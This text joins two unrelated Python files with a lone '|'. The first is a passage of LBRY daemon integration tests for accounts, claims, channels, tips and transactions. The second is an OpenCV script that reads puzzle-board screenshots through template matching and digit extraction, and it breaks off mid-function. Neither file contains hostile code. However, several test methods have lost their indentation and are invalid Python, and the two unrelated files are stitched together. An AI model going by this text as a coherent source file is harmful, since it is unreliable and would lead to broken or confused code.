        response = (await self.daemon.jsonrpc_account_list())['lbc_regtest'][0]
        self.assertEqual(response['name'], 'test account')
        self.assertEqual(
            response['address_generator']['receiving'],
            {'gap': 95, 'maximum_uses_per_address': 96}
        )
        self.assertEqual(
            response['address_generator']['change'],
            {'gap': 97, 'maximum_uses_per_address': 98}
        )
        # create another account
        await self.daemon.jsonrpc_account_create('second account')
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 2)
        self.assertEqual(response['lbc_regtest'][1]['name'], 'second account')
        account_id2 = response['lbc_regtest'][1]['id']
        # make new account the default; the original account moves to index 1
        self.daemon.jsonrpc_account_set(account_id=account_id2, default=True)
        response = await self.daemon.jsonrpc_account_list(show_seed=True)
        self.assertEqual(response['lbc_regtest'][0]['name'], 'second account')
        account_seed = response['lbc_regtest'][1]['seed']
        # remove the original account
        self.daemon.jsonrpc_account_remove(response['lbc_regtest'][1]['id'])
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 1)
        # re-add it from its seed under a new name; same seed means same id
        await self.daemon.jsonrpc_account_add('recreated account', seed=account_seed)
        response = await self.daemon.jsonrpc_account_list()
        self.assertEqual(len(response['lbc_regtest']), 2)
        self.assertEqual(response['lbc_regtest'][1]['name'], 'recreated account')
        # list specific account: account_id is the original account, which was
        # just re-added from its seed and renamed 'recreated account'
        response = await self.daemon.jsonrpc_account_list(account_id, include_claims=True)
        self.assertEqual(response['name'], 'recreated account')
class ClaimManagement(CommandTestCase):
VERBOSITY = logging.WARN
async def make_claim(self, name='hovercraft', amount='1.0', data=b'hi!', channel_name=None, confirm=True):
with tempfile.NamedTemporaryFile() as file:
file.write(data)
file.flush()
claim = await self.out(self.daemon.jsonrpc_publish(
name, amount, file_path=file.name, channel_name=channel_name
))
self.assertTrue(claim['success'])
if confirm:
await self.on_transaction_dict(claim['tx'])
await self.generate(1)
await self.on_transaction_dict(claim['tx'])
return claim
async def craft_claim(self, name, amount_dewies, claim_dict, address):
# FIXME: this is here mostly because publish has defensive code for situations that happens accidentally
# However, it still happens... So, let's reproduce them.
claim = ClaimDict.load_dict(claim_dict)
address = address or (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
tx = await Transaction.claim(name, claim, amount_dewies, address, [self.account], self.account)
await self.broadcast(tx)
await self.ledger.wait(tx)
await self.generate(1)
await self.ledger.wait(tx)
return tx
    async def test_create_update_and_abandon_claim(self):
        """Claim lifecycle: creation appears in claim_info, an update in
        update_info and an abandon in abandon_info, with fees and account
        balances matching at every step."""
        self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
        claim = await self.make_claim(amount='2.5') # creates new claim
        txs = await self.out(self.daemon.jsonrpc_transaction_list())
        self.assertEqual(len(txs[0]['claim_info']), 1)
        self.assertEqual(txs[0]['confirmations'], 1)
        self.assertEqual(txs[0]['claim_info'][0]['balance_delta'], '-2.5')
        self.assertEqual(txs[0]['claim_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs[0]['value'], '0.0')
        self.assertEqual(txs[0]['fee'], '-0.020107')
        self.assertEqual('7.479893', await self.daemon.jsonrpc_account_balance())
        await self.make_claim(amount='1.0') # updates previous claim
        txs = await self.out(self.daemon.jsonrpc_transaction_list())
        self.assertEqual(len(txs[0]['update_info']), 1)
        # lowering the bid from 2.5 to 1.0 returns 1.5 to the account
        self.assertEqual(txs[0]['update_info'][0]['balance_delta'], '1.5')
        self.assertEqual(txs[0]['update_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs[0]['value'], '0.0')
        self.assertEqual(txs[0]['fee'], '-0.0001955')
        self.assertEqual('8.9796975', await self.daemon.jsonrpc_account_balance())
        await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
        txs = await self.out(self.daemon.jsonrpc_transaction_list())
        self.assertEqual(len(txs[0]['abandon_info']), 1)
        self.assertEqual(txs[0]['abandon_info'][0]['balance_delta'], '1.0')
        self.assertEqual(txs[0]['abandon_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs[0]['value'], '0.0')
        self.assertEqual(txs[0]['fee'], '-0.000107')
        self.assertEqual('9.9795905', await self.daemon.jsonrpc_account_balance())
async def test_update_claim_holding_address(self):
other_account_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
other_account = self.daemon.get_account_or_error(other_account_id)
other_address = await other_account.receiving.get_or_create_usable_address()
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
# create the initial name claim
claim = await self.make_claim()
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 1)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 0)
tx = await self.daemon.jsonrpc_claim_send_to_address(
claim['claim_id'], other_address
)
await self.ledger.wait(tx)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 0)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 1)
    async def test_publishing_checks_all_accounts_for_certificate(self):
        """Publishing into a channel must find the channel certificate in any
        account by default, honor channel_account_id when given, and fail when
        the named account does not hold the certificate."""
        account1_id, account1 = self.account.id, self.account
        new_account = await self.daemon.jsonrpc_account_create('second account')
        account2_id, account2 = new_account['id'], self.daemon.get_account_or_error(new_account['id'])
        # @spam's certificate lives in account1
        spam_channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', '1.0'))
        self.assertTrue(spam_channel['success'])
        await self.confirm_tx(spam_channel['tx']['txid'])
        self.assertEqual('8.989893', await self.daemon.jsonrpc_account_balance())
        result = await self.out(self.daemon.jsonrpc_wallet_send(
            '5.0', await self.daemon.jsonrpc_address_unused(account2_id)
        ))
        await self.confirm_tx(result['txid'])
        self.assertEqual('3.989769', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
        # @baz's certificate lives in account2
        baz_channel = await self.out(self.daemon.jsonrpc_channel_new('@baz', '1.0', account2_id))
        self.assertTrue(baz_channel['success'])
        await self.confirm_tx(baz_channel['tx']['txid'])
        channels = await self.out(self.daemon.jsonrpc_channel_list(account1_id))
        self.assertEqual(len(channels), 1)
        self.assertEqual(channels[0]['name'], '@spam')
        self.assertEqual(channels, await self.out(self.daemon.jsonrpc_channel_list()))
        channels = await self.out(self.daemon.jsonrpc_channel_list(account2_id))
        self.assertEqual(len(channels), 1)
        self.assertEqual(channels[0]['name'], '@baz')
        # defaults to using all accounts to lookup channel
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'hi!')
            file.flush()
            claim1 = await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '1.0', file_path=file.name, channel_name='@baz'
            ))
            self.assertTrue(claim1['success'])
            await self.confirm_tx(claim1['tx']['txid'])
        # uses only the specific accounts which contains the channel
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'hi!')
            file.flush()
            claim1 = await self.out(self.daemon.jsonrpc_publish(
                'hovercraft', '1.0', file_path=file.name,
                channel_name='@baz', channel_account_id=[account2_id]
            ))
            self.assertTrue(claim1['success'])
            await self.confirm_tx(claim1['tx']['txid'])
        # fails when specifying account which does not contain channel
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'hi!')
            file.flush()
            with self.assertRaisesRegex(ValueError, "Couldn't find channel with name '@baz'."):
                await self.out(self.daemon.jsonrpc_publish(
                    'hovercraft', '1.0', file_path=file.name,
                    channel_name='@baz', channel_account_id=[account1_id]
                ))
    async def test_updating_claim_includes_claim_value_in_balance_check(self):
        """Updating an existing claim must treat the already-staked claim
        amount as spendable, and publishing above that combined limit must
        raise InsufficientFundsError with the exact maximum in the message.
        """
        # Fresh account starts with 10 LBC.
        self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
        await self.make_claim(amount='9.0')
        self.assertEqual('0.979893', await self.daemon.jsonrpc_account_balance())
        # update the same claim: only fees are lost, not another 9.0
        await self.make_claim(amount='9.0')
        self.assertEqual('0.9796235', await self.daemon.jsonrpc_account_balance())
        # update the claim a second time but use even more funds
        await self.make_claim(amount='9.97')
        self.assertEqual('0.009354', await self.daemon.jsonrpc_account_balance())
        # fails when specifying more than available
        with tempfile.NamedTemporaryFile() as file:
            file.write(b'hi!')
            file.flush()
            with self.assertRaisesRegex(
                InsufficientFundsError,
                "Please lower the bid value, the maximum amount"
                " you can specify for this claim is 9.97928."
            ):
                await self.out(self.daemon.jsonrpc_publish(
                    'hovercraft', '9.98', file_path=file.name
                ))
    async def test_abandoning_claim_at_loss(self):
        """Abandoning a claim refunds the staked amount minus the tx fees
        (balance ends slightly below the starting 10 LBC)."""
        self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
        claim = await self.make_claim(amount='0.0001')
        self.assertEqual('9.979793', await self.daemon.jsonrpc_account_balance())
        await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
        # Stake returned, fees for claim + abandon are gone.
        self.assertEqual('9.97968399', await self.daemon.jsonrpc_account_balance())
    async def test_abandoned_channel_with_signed_claims(self):
        """Resolution behavior for claims signed by a channel that was
        abandoned and re-created: old signatures become invalid, and a
        channel URI resolves only claims with currently-valid signatures.
        """
        channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])
        claim = await self.make_claim(amount='0.0001', name='on-channel-claim', channel_name='@abc')
        self.assertTrue(claim['success'])
        # Abandon the channel certificate, then create a new '@abc'.
        abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=channel['tx']['txid'], nout=0, blocking=False))
        self.assertTrue(abandon['success'])
        channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])
        # Original channel doesn't exist anymore, so the signature is invalid.
        # For invalid signatures, resolution is only possible outside a channel.
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@abc/on-channel-claim'))
        self.assertNotIn('claim', response['lbry://@abc/on-channel-claim'])
        response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://on-channel-claim'))
        self.assertIn('claim', response['lbry://on-channel-claim'])
        self.assertFalse(response['lbry://on-channel-claim']['claim']['signature_is_valid'])
        direct_uri = 'lbry://on-channel-claim#' + claim['claim_id']
        response = await self.out(self.daemon.jsonrpc_resolve(uri=direct_uri))
        self.assertIn('claim', response[direct_uri])
        self.assertFalse(response[direct_uri]['claim']['signature_is_valid'])
        uri = 'lbry://@abc/on-channel-claim'
        # now, claim something on this channel (it will update the invalid claim, but we save and forcefully restore)
        original_claim = await self.make_claim(amount='0.00000001', name='on-channel-claim', channel_name='@abc')
        self.assertTrue(original_claim['success'])
        # resolves normally
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertIn('claim', response[uri])
        self.assertTrue(response[uri]['claim']['signature_is_valid'])
        # tamper it, invalidating the signature
        value = response[uri]['claim']['value'].copy()
        value['stream']['metadata']['author'] = 'some troll'
        address = response[uri]['claim']['address']
        await self.craft_claim('on-channel-claim', 1, value, address)
        # it resolves to the now only valid claim under the channel, ignoring the fake one
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertIn('claim', response[uri])
        self.assertTrue(response[uri]['claim']['signature_is_valid'])
        # ooops! claimed a valid conflict! (this happens on the wild, mostly by accident or race condition)
        await self.craft_claim('on-channel-claim', 1, response[uri]['claim']['value'], address)
        # it still resolves! but to the older claim
        response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
        self.assertIn('claim', response[uri])
        self.assertTrue(response[uri]['claim']['signature_is_valid'])
        self.assertEqual(response[uri]['claim']['txid'], original_claim['tx']['txid'])
    async def test_claim_list_by_channel(self):
        """claim_list_by_channel pagination: ordering, page slicing, and the
        error payload returned for an out-of-range page."""
        self.maxDiff = None
        # Pre-fund with 100 small outputs so 12 claim txs can be made quickly.
        tx = await self.daemon.jsonrpc_account_fund(None, None, '0.001', outputs=100, broadcast=True)
        await self.ledger.wait(tx)
        await self.generate(1)
        await self.ledger.wait(tx)
        channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "0.0001"))
        self.assertTrue(channel['success'])
        await self.confirm_tx(channel['tx']['txid'])
        # 4 claims per block, 3 blocks. Sorted by height (descending) then claim_id (ascending).
        claims = []
        for j in range(3):
            same_height_claims = []
            for k in range(3):
                claim = await self.make_claim(amount='0.000001', name=f'c{j}-{k}', channel_name='@abc', confirm=False)
                self.assertTrue(claim['success'])
                same_height_claims.append(claim['claim_id'])
                await self.on_transaction_dict(claim['tx'])
            # Fourth claim per round confirms, sealing the block.
            claim = await self.make_claim(amount='0.000001', name=f'c{j}-4', channel_name='@abc', confirm=True)
            self.assertTrue(claim['success'])
            same_height_claims.append(claim['claim_id'])
            # Within one height, claim_ids sort ascending as hex integers.
            same_height_claims.sort(key=lambda x: int(x, 16))
            claims = same_height_claims + claims
        page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=20, uri='@abc'))
        page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
        self.assertEqual(page_claim_ids, claims)
        page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=6, uri='@abc'))
        page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
        self.assertEqual(page_claim_ids, claims[:6])
        # Page 2 with page_size 20 starts past the 12 existing claims.
        out_of_bounds = await self.out(self.daemon.jsonrpc_claim_list_by_channel(2, page_size=20, uri='@abc'))
        self.assertEqual(out_of_bounds['error'], 'claim 20 greater than max 12')
    async def test_regular_supports_and_tip_supports(self):
        """Tips transfer funds to the claim owner (is_tip=True on both sides);
        plain supports lock the sender's own funds (is_tip=False)."""
        # account2 will be used to send tips and supports to account1
        account2_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
        # send account2 5 LBC out of the 10 LBC in account1
        result = await self.out(self.daemon.jsonrpc_wallet_send(
            '5.0', await self.daemon.jsonrpc_address_unused(account2_id)
        ))
        await self.confirm_tx(result['txid'])
        # account1 and account2 balances:
        self.assertEqual('4.999876', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
        # create the claim we'll be tipping and supporting
        claim = await self.make_claim()
        # account1 and account2 balances:
        self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
        # send a tip to the claim using account2
        tip = await self.out(
            self.daemon.jsonrpc_claim_tip(claim['claim_id'], '1.0', account2_id)
        )
        await self.on_transaction_dict(tip)
        await self.generate(1)
        await self.on_transaction_dict(tip)
        # tips don't affect balance so account1 balance is same but account2 balance went down
        self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('3.9998585', await self.daemon.jsonrpc_account_balance(account2_id))
        # verify that the incoming tip is marked correctly as is_tip=True in account1
        txs = await self.out(self.daemon.jsonrpc_transaction_list())
        self.assertEqual(len(txs[0]['support_info']), 1)
        self.assertEqual(txs[0]['support_info'][0]['balance_delta'], '1.0')
        self.assertEqual(txs[0]['support_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs[0]['support_info'][0]['is_tip'], True)
        self.assertEqual(txs[0]['value'], '1.0')
        self.assertEqual(txs[0]['fee'], '0.0')
        # verify that the outgoing tip is marked correctly as is_tip=True in account2
        txs2 = await self.out(
            self.daemon.jsonrpc_transaction_list(account2_id)
        )
        self.assertEqual(len(txs2[0]['support_info']), 1)
        self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-1.0')
        self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs2[0]['support_info'][0]['is_tip'], True)
        self.assertEqual(txs2[0]['value'], '-1.0')
        self.assertEqual(txs2[0]['fee'], '-0.0001415')
        # send a support to the claim using account2
        support = await self.out(
            self.daemon.jsonrpc_claim_new_support('hovercraft', claim['claim_id'], '2.0', account2_id)
        )
        await self.on_transaction_dict(support)
        await self.generate(1)
        await self.on_transaction_dict(support)
        # account2 balance went down ~2
        self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
        self.assertEqual('1.999717', await self.daemon.jsonrpc_account_balance(account2_id))
        # verify that the outgoing support is marked correctly as is_tip=False in account2
        txs2 = await self.out(self.daemon.jsonrpc_transaction_list(account2_id))
        self.assertEqual(len(txs2[0]['support_info']), 1)
        self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-2.0')
        self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
        self.assertEqual(txs2[0]['support_info'][0]['is_tip'], False)
        # support value stays in the account, so tx value is 0.0
        self.assertEqual(txs2[0]['value'], '0.0')
        self.assertEqual(txs2[0]['fee'], '-0.0001415')
class TransactionCommandsTestCase(CommandTestCase):
    """Integration tests for transaction_show and utxo_release commands."""

    async def test_transaction_show(self):
        """transaction_show resolves local txs, foreign txs (with mempool
        height -2 until confirmed), and reports failure for unknown ids."""
        # local tx
        result = await self.out(self.daemon.jsonrpc_wallet_send(
            '5.0', await self.daemon.jsonrpc_address_unused(self.account.id)
        ))
        await self.confirm_tx(result['txid'])
        tx = await self.daemon.jsonrpc_transaction_show(result['txid'])
        self.assertEqual(tx.id, result['txid'])
        # someone's tx
        change_address = await self.blockchain.get_raw_change_address()
        sendtxid = await self.blockchain.send_to_address(change_address, 10)
        tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
        self.assertEqual(tx.id, sendtxid)
        # height -2 marks an unconfirmed (mempool) transaction
        self.assertEqual(tx.height, -2)
        await self.generate(1)
        tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
        self.assertEqual(tx.height, self.ledger.headers.height)
        # inexistent
        result = await self.daemon.jsonrpc_transaction_show('0'*64)
        self.assertFalse(result['success'])

    async def test_utxo_release(self):
        """Reserving all utxos zeroes the spendable balance; utxo_release
        restores it."""
        sendtxid = await self.blockchain.send_to_address(
            await self.account.receiving.get_or_create_usable_address(), 1
        )
        await self.confirm_tx(sendtxid)
        await self.assertBalance(self.account, '11.0')
        await self.ledger.reserve_outputs(await self.account.get_utxos())
        await self.assertBalance(self.account, '0.0')
        await self.daemon.jsonrpc_utxo_release()
        await self.assertBalance(self.account, '11.0')
|
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
import os
tm_method = cv2.TM_CCOEFF_NORMED
def load_sample(size):
    """Load the screenshot sample image for a size x size board."""
    path = f'../private/sample-{size}x{size}.png'
    return cv2.imread(path)
def find_and_mark_matches(img, result, pat_dims, threshold):
    """Find and mark matching places given a result of matchTemplate.

    Draws a rectangle on a copy of img at every position whose match
    score exceeds threshold; the original image is left untouched.
    """
    img_marked = img.copy()
    rows, cols = result.shape
    pat_h, pat_w = pat_dims
    for r in range(rows):
        for c in range(cols):
            score = result[r, c]
            if score <= threshold:
                continue
            print(r, c, score)
            top_left = (c, r)
            bottom_right = (c + pat_w, r + pat_h)
            cv2.rectangle(img_marked, top_left, bottom_right, 255, 2)
    return img_marked
def scale_pattern(pat_orig, target_width):
    """Scale pat_orig so its width becomes target_width, preserving aspect.

    Bug fix: cv2.resize's third positional argument is `dst`, not the
    interpolation flag, so the original call handed INTER_AREA to `dst`
    and the interpolation mode silently stayed at the default. Pass it
    by keyword instead.
    """
    pat_orig_h, pat_orig_w = pat_orig.shape[0], pat_orig.shape[1]
    scale = target_width / pat_orig_w
    pat_h = round(pat_orig_h * scale)
    pat_w = round(pat_orig_w * scale)
    return cv2.resize(pat_orig, (pat_w, pat_h), interpolation=cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
    """Search for the pattern width whose scaled template best matches img.

    Coarse-to-fine search: start from a coarse grid of candidate widths,
    keep roughly the top 10% each round, then expand around the survivors
    with half the step until the step reaches zero.

    Fixes: removed the dead `pat_w, pat_h, _ = pat.shape` unpack (it also
    had width/height swapped — ndarray shape is (h, w, channels)) and the
    unused minMaxLoc outputs.

    Returns the best width found (int).
    """
    eval_count = 0

    @functools.lru_cache()
    def evaluate_width(width):
        # Score a width by the best matchTemplate response it yields.
        nonlocal eval_count
        pat = scale_pattern(pat_orig, width)
        result = cv2.matchTemplate(img, pat, tm_method)
        _, max_val, _, _ = cv2.minMaxLoc(result)
        eval_count += 1
        return max_val

    # search within this range, with decreasing steps per iteration until
    # we reach a local maxima
    min_width, max_width = 30, 220
    step = 16
    candidates = set(range(min_width, max_width, step))
    while True:
        sorted_candidates = sorted(candidates, key=evaluate_width, reverse=True)
        # Only top few candidates survive.
        keep = max(1, math.floor(len(sorted_candidates) * 0.1))
        candidates = sorted_candidates[:keep]
        step //= 2
        if not step:
            break
        # candidate expansion for next iteration.
        candidates = {
            y
            for x in candidates
            for y in [x - step, x, x + step]
            if min_width <= y <= max_width
        }
    # note that at this point candidates is a best-first sorted list
    best_target_width = candidates[0]
    print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
    return best_target_width
def resample_pattern_from_image(pat_orig, img):
    """Re-extract the best-matching region of img as a fresh pattern.

    Optimizes the pattern width first, then crops img at the location
    of the strongest template match.
    """
    width = optimize_pattern_width(pat_orig, img)
    pat = scale_pattern(pat_orig, width)
    pat_h, pat_w, _ = pat.shape
    match_map = cv2.matchTemplate(img, pat, tm_method)
    _, _, _, max_loc = cv2.minMaxLoc(match_map)
    col, row = max_loc
    return img[row:row + pat_h, col:col + pat_w]
def subplot_gray(num, img, title):
    """Show img as grayscale in subplot `num` with title and no axis ticks."""
    pyplot.subplot(num)
    pyplot.imshow(img, cmap='gray')
    pyplot.title(title)
    pyplot.xticks([])
    pyplot.yticks([])
def subplot_color(num, img, title):
    """Show a BGR img in subplot `num` by reordering channels to RGB."""
    pyplot.subplot(num)
    pyplot.imshow(img[:, :, [2, 1, 0]])
    pyplot.title(title)
    pyplot.xticks([])
    pyplot.yticks([])
def main_all_samples():
    """Print the optimized pattern width for every sample board size."""
    pat_orig = cv2.imread('../sample/tree-sample.png')
    for i in range(5, 23):
        target_width = optimize_pattern_width(pat_orig, load_sample(i))
        print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold=3):
    """Collapse noisy coordinate counts into `size` representative values.

    Keys of d are coordinates, values are occurrence counts. Walking the
    keys in ascending order, a key closer than `threshold` to the first
    key of the currently open group joins that group; otherwise a new
    group starts. Each group is reduced to the weighted average of its
    keys. Returns an iterator of `size` averages (asserts that exactly
    `size` groups were formed).
    """
    groups = []
    current = None  # (first_key, {key: count}) of the open group
    for key, count in sorted(d.items(), key=lambda kv: kv[0]):
        if current is None:
            current = (key, {key: count})
            continue
        first_key, members = current
        if key - first_key < threshold:
            members[key] = count
        else:
            groups.append(members)
            current = (key, {key: count})
    if current is not None:
        groups.append(current[1])
    # TODO: given sufficient info we might be able to
    # "fill in the blank" if there are missing elements,
    # but for now it seems good enough to not worry about
    # this issue.
    assert len(groups) == size

    # weighted average of one group's keys, weighted by their counts
    def weighted_average(members):
        numer = sum(k * v for k, v in members.items())
        denom = sum(members.values())
        return numer / denom

    return map(weighted_average, groups)
def rescale_and_match(img, templ_in, tm_method):
    """Rescale templ_in to the content width of img and return the best
    matchTemplate score, or None when matching is impossible.

    Bug fix: cv2.resize's third positional argument is `dst`, not the
    interpolation flag — INTER_AREA must be passed by keyword. Also
    removed the unused `scale` local.
    """
    (_, _, w, h) = cv2.boundingRect(img)
    if w == 0 or h == 0:
        # blank image: nothing to match against
        return None
    # try to rescale pattern to match image width (of the bounding rect)
    # we are targeting width here because we can prevent one digit pattern
    # to match with multiple digit ones this way.
    # also because digits tend to vary more in horizontal direction
    # so we are actually eliminating lots of candidates this way.
    templ_in_h, templ_in_w = templ_in.shape
    templ_h = round(templ_in_h * w / templ_in_w)
    if templ_h > h:
        # scaled template would be taller than the content; cannot fit
        return None
    templ = cv2.resize(templ_in, (w, templ_h), interpolation=cv2.INTER_AREA)
    result = cv2.matchTemplate(img, templ, tm_method)
    _, max_val, _, _ = cv2.minMaxLoc(result)
    return max_val
def find_cell_bounds(img, size):
    """Locate the pixel bounds of the size x size board cells.

    Flood-fills every region matching the blank-cell color, collects the
    begin/end coordinates of each filled rectangle into histograms, and
    reduces those noisy histograms to exactly `size` row bounds and
    `size` column bounds via resolve_stat.

    Returns (row_bounds, col_bounds), each a list of (begin, end)
    inclusive pixel coordinates.
    """
    h, w, _ = img.shape
    # This is the exact color that game uses for blank cells.
    bk = (49, 49, 52)
    result = cv2.inRange(img, bk, bk)
    mk_stat = lambda: collections.defaultdict(lambda: 0)
    row_begins_stat = mk_stat()
    row_ends_stat = mk_stat()
    col_begins_stat = mk_stat()
    col_ends_stat = mk_stat()
    # floodFill's mask must be 2 pixels larger than the image in each dim.
    mask = np.zeros((h+2, w+2), dtype=np.uint8)
    # skip first region encountered, which is likely just the difficulty box
    # on the top right corner.
    first_skipped = False
    for r in range(h):
        for c in range(w):
            if (result[r,c] != 0):
                x, y = c, r
                # Erase the region as it is counted so each cell fills once.
                retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
                rect_x, rect_y, rect_w, rect_h = rect
                if not first_skipped:
                    first_skipped = True
                    continue
                row_begins_stat[rect_y] += 1
                col_begins_stat[rect_x] += 1
                rect_x_end = rect_x + rect_w - 1
                rect_y_end = rect_y + rect_h - 1
                row_ends_stat[rect_y_end] += 1
                col_ends_stat[rect_x_end] += 1
    def make_bounds(begin_stat, end_stat):
        # Pair up the `size` averaged begin coords with the end coords.
        begin_coords = map(round, resolve_stat(begin_stat, size))
        end_coords = map(round, resolve_stat(end_stat, size))
        return list(map(lambda x,y: (x,y), begin_coords, end_coords))
    row_bounds = make_bounds(row_begins_stat, row_ends_stat)
    col_bounds = make_bounds(col_begins_stat, col_ends_stat)
    return row_bounds, col_bounds
def main_experiment():
    """Experimental pipeline on the 22x22 sample: locate cells, detect
    trees per cell, extract the digit strips for rows/columns, and show
    everything in a 2x2 matplotlib figure."""
    size = 22
    img = load_sample(size)
    h, w, _ = img.shape
    row_bounds, col_bounds = find_cell_bounds(img, size)
    cells = [ [ None for _ in range(size) ] for _ in range(size)]
    for r, (row_lo, row_hi) in enumerate(row_bounds):
        for c, (col_lo, col_hi) in enumerate(col_bounds):
            cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
    def find_tree(cell_img):
        # A cell contains a tree iff the tree shade color appears in it;
        # render the verdict as a small 4x4 white/black tile.
        color_shade = (0x55, 0xc8, 0x87)
        result = cv2.inRange(cell_img, color_shade, color_shade)
        (_,_,w,h) = cv2.boundingRect(result)
        if w != 0 and h != 0:
            color = 0xFF
        else:
            color = 0
        return np.full((4,4), color)
    recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
    cell_results_recombined = np.concatenate([
        np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
    ], axis=0)
    max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
    def extract_digit(row,col):
        # A square patch one cell wide starting at (row, col).
        return img[row:row+max_cell_side-1,col:col+max_cell_side-1]
    # Suppose first two cells are A and B, we can then find a cell C if we extend
    # difference between A and B but in the other direction.
    # A - (B - A) = 2A - B
    digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
    digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
    color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
    color_sat = (0x97, 0xa7, 0xc8)
    side_length_for_display = math.ceil(max_cell_side * 1.1)
    def process_digit_cell(dg_img):
        # Mask to the unsat-digit color and crop to its bounding box;
        # None when the cell contains no digit of that color.
        result = cv2.inRange(dg_img, color_unsat, color_unsat)
        (x,y,w,h) = cv2.boundingRect(result)
        if w == 0 or h == 0:
            return None
        return result[y:y+h,x:x+w]
    def padding_digit_img(dg_img):
        # Center dg_img on a gray square tile for uniform display.
        if dg_img is None:
            return np.full((side_length_for_display, side_length_for_display), 0x7F)
        h, w = dg_img.shape
        top = math.floor((side_length_for_display - h) / 2)
        bottom = side_length_for_display - top - h
        left = math.floor((side_length_for_display - w) / 2)
        right = side_length_for_display - left - w
        return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
    # TODO: make a matrix of matching results of matchTemplate for row / col digits.
    # where the template is digits cropped by bounding rect,
    # and image is the digit picture after inRange filter.
    # TODO: scaling is for now ignored but we'll do something about it
    # plan: run boundingRect on digit image, and use height of resulting
    # rectangle to scale the template into same height before matchTemplate run.
    # digits accompanying every column.
    col_digits = [
        extract_digit(digit_row_start,col_lo)
        for col_lo, _ in col_bounds
    ]
    col_digit_templs = [ process_digit_cell(d) for d in col_digits ]
    # same but for rows
    row_digits = [
        extract_digit(row_lo,digit_col_start)
        for row_lo, _ in row_bounds
    ]
    row_digit_templs = [ process_digit_cell(d) for d in row_digits ]
    def debug_cross_compare(digits, digit_templs):
        # Print a score matrix of every digit image against every template.
        for dg_img_pre in digits:
            dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
            line = []
            for templ in digit_templs:
                if templ is None:
                    line.append('------')
                    continue
                max_val = rescale_and_match(dg_img,templ,tm_method)
                if max_val is None:
                    line.append('------')
                    continue
                line.append(f'{max_val:.4f}')
            print(', '.join(line))
    print('Mat for row digits:')
    debug_cross_compare(row_digits, row_digit_templs)
    print('Mat for col digits:')
    debug_cross_compare(col_digits, col_digit_templs)
    digits = np.concatenate(
        [
            np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
            np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
        ])
    # digit sample extraction steps (for each single cell image)
